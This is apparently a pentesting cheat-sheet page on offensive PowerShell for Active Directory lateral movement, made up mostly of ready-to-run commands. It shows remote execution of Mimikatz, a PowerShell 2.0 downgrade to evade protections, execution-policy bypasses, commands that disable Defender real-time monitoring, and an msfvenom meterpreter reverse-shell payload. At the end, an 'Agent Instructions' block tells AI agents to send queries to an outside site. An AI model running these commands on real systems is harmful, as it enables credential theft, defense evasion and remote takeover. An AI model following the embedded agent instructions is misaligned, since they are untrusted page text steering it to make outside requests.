# PowerShell ### Basic Usage #### Creating a PowerShell Session **Background:** We can establish a persistent connection in PowerShell using Enter-PSSession. This can make life significantly easier and reduce overhead. ```bash New-PSSession -ComputerName [IP] -Credential [USER] Enter-PSSession -Session $# ``` #### Executing Scripts Remotely **Background:** We can execute scripts remotely with PowerShell. ```bash Invoke-Command -Session $# -FilePath C:\Users\Parzival\Desktop\Mimikatz.exe ``` ### Enumeration #### Enumerate Installed Versions **Background:** This can be helpful when determining if a PowerShell downgrade attack will work. ```bash (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\PowerShell\*\PowerShellEngin e -Name PowerShellVersion).PowerShellVersion ``` This is important as if PowerShell 2.0 is installed then we can bypass multiple security protections enabled in more recent PowerShell Version 5 releases: ```bash powershell.exe -Version 2 ``` ### Offensive PowerShell #### Bypassing Execution Policy **Information:** Execution policies can be disabled in multiple ways. It is not a sufficient security protection to prevent unsigned scripts from being loaded. ```bash powershell.exe -exec bypass Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process ``` #### Bypassing Real-time Monitoring ```bash Powershell Set-MpPreference -DisableRealtimeMonitoring $true Powershell Set-MpPreference -DisableIOAVProtection $true ``` #### Meterpreter Shell ```bash msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=$ip LPORT=$port ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ttp.parzival.sh/pentesting/infrastructure/active-directory/lateral_movement/exploitation_with_powershell.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.